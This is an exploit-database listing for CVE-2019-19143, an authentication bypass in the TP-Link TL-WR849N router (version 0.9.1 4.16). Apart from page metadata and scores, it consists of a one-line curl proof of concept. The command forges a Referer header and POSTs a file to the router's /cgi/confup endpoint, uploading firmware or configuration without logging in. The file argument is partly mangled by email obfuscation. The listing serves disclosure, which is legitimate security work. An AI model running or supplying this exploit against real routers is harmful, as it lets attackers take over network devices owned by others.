Lucene search

K
zdtElber Tavares1337DAY-ID-34036
HistoryMar 02, 2020 - 12:00 a.m.

TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware) Vulnerability

2020-03-0200:00:00
Elber Tavares
0day.today
83

0.003 Low

EPSS

Percentile

71.8%

Exploit for hardware platform in category web applications

# Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-CVE-2019-19143

Uploading new firmware without access to the panel

REFS:
 https://github.com/ElberTavares/routers-exploit/tp-link
 https://fireshellsecurity.team/hack-n-routers/


Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://TARGET/mainFrame.htm" -F [emailΒ protected]
http://TARGET/cgi/confup

#  0day.today [2020-03-04]  #

0.003 Low

EPSS

Percentile

71.8%